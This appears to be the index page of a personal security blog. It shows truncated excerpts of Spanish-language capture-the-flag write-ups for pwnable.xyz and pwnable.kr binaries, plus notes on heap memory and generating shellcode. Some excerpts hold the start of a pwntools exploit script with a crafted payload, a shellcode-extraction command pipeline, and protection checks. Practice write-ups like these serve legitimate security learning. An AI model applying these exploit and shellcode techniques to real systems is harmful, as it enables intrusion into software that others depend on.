Challenge GrownUp from pwnable.xyz nc svc.pwnable.xyz 30004 Exploit from pwn import * context.log_level = 'debug' p = remote("svc.pwnable.xyz",30004) #p = process('./GrownUpRedist') #gdb.attach(p,''' #break *0x0000000000400914 #continue #''') p.recvuntil("Are you 18 years or older? [y/N]: ") payload = "\x79"+"aaaBCCC"+"\x80\x10\x60" p.sendline(payload) p.recvuntil("Name: ") #payload = "AAAABBBBA..
Welcome Date: 11/01/2019-12/01/2019 @naivenom 5.1 Reconocimiento gef➤ checksec [+] checksec for '/home/binary/pwnable.xyz/welcome/challenge' Canary : Yes → value: 0x9ce8bf03e7ef2500 NX : Yes PIE : Yes Fortify : Yes RelRO : Full 5.2 Fast Pwn Analysis Si usamos GDB la dirección del main la localizo empezando debuggeando por el entrypoint, en mi caso 0x555555554920 Ponemos un breakpoint ahí y empez..
Brainfuck Date: 08/01/2019-09/01/2019 @naivenom 4.1 Reconocimiento gef➤ checksec [+] checksec for '/home/binary/pwnable.kr/brainfuck/bf' Canary : Yes NX : Yes PIE : No Fortify : No RelRO : Partial Canary and NX (No shellcode) 4.2 Deep Reversing Analysis Como no puede ser de otra manera vamos solo a centrarnos en realizar reversing instrucción por instrucción y tomar notas de que es lo que esta s..
Horcruxes Date: 05/01/2019-08/01/2019 @naivenom 3.1 Deep Reversing Analysis Primero vemos las protecciones y tiene NX habilitado en áreas como no ejecutable. gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partial Vemos las funciones que usa el binario, Non-debugging symbols: 0x0809fbec _init 0x0809fc20 seccomp_init@plt 0x0809fc30 read@plt 0x0809fc40 p..
Date: 30/12/2018-02/01/2019 @naivenom 2.1 Heap memory Esta asignada dinamicamente. La memoria es global esto quiere decir que es accesible desde cualquier "lugar" dentro del programa y no esta localizada en la función donde es allocated. Esto se logra usando 'punteros' para hacer referencia a la memoria asignada dinámicamente. stdlib.h --> Nos permite acceder, modificar y manejar dinámicamente l..
ASM 1.1 Generate Shellcode naivenom@kali:/opt/shellme$ objdump -d ./test|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' Compilar una shellcode en asm: sudo nasm -f elf64 -o test.o test.asm sudo ld -nostartfiles -nostdlib -z noexecstack -m elf_x86_64 -s -o test test.o 1.2 Writing your ASM C..
- Total
- Today
- Yesterday
- XSS
- format string
- pwnable.tw
- hijacking redirection flow
- ASM
- Call oriented programming
- theFaunia course
- Windows
- shellcode
- write primitive
- cracking
- leak libc
- use after free
- dnspy
- Backdoors
- x64dbg
- 32Bit
- GOT Dereferencing/Overwriting
- return oriented programming
- html injection
- arithmetic overflow/underflow
- pwnable.xyz
- Pwnable.kr
- one gadget
- leak stack memory address
- canary
- stack pivot
- open-redirect
- fake stack frame
- buffer overflow
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 |